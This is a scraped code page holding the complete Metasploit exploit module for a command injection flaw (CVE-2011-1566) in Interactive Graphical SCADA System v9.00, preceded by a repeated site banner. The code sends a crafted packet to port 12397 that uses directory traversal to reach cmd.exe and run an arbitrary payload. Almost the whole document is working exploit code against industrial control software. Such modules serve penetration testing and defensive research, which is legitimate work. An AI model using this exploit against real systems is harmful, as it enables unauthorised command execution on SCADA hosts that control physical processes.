Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/exploits/windows/scada/igss_exec_17.rb
Views: 11783
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include Msf::Exploit::Remote::Tcp910def initialize(info = {})11super(update_info(info,12'Name' => 'Interactive Graphical SCADA System Remote Command Injection',13'Description' => %q{14This module abuses a directory traversal flaw in Interactive15Graphical SCADA System v9.00. In conjunction with the traversal16flaw, if opcode 0x17 is sent to the dc.exe process, an attacker17may be able to execute arbitrary system commands.18},19'Author' =>20[21'Luigi Auriemma',22'MC'23],24'License' => MSF_LICENSE,25'References' =>26[27[ 'CVE', '2011-1566'],28[ 'OSVDB', '72349'],29[ 'URL', 'http://aluigi.org/adv/igss_8-adv.txt' ],30],31'Platform' => 'win',32'Arch' => ARCH_CMD,33'Payload' =>34{35'Space' => 153,36'DisableNops' => true37},38'Targets' =>39[40[ 'Windows', {} ]41],42'DefaultTarget' => 0,43'Privileged' => false,44'DisclosureDate' => '2011-03-21'))4546register_options(47[48Opt::RPORT(12397)49])50end5152def exploit5354print_status("Sending exploit packet...")5556connect5758packet = [0x00000100].pack('V') + [0x00000000].pack('V')59packet << [0x00000100].pack('V') + [0x00000017].pack('V')60packet << [0x00000000].pack('V') + [0x00000000].pack('V')61packet << [0x00000000].pack('V') + [0x00000000].pack('V')62packet << [0x00000000].pack('V') + [0x00000000].pack('V')63packet << [0x00000000].pack('V')64packet << "..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\"65packet << "windows\\system32\\cmd.exe\" /c #{payload.encoded}"66packet << "\x00" * (143) #6768sock.put(packet)69sock.get_once(-1,0.5)70disconnect7172end73end747576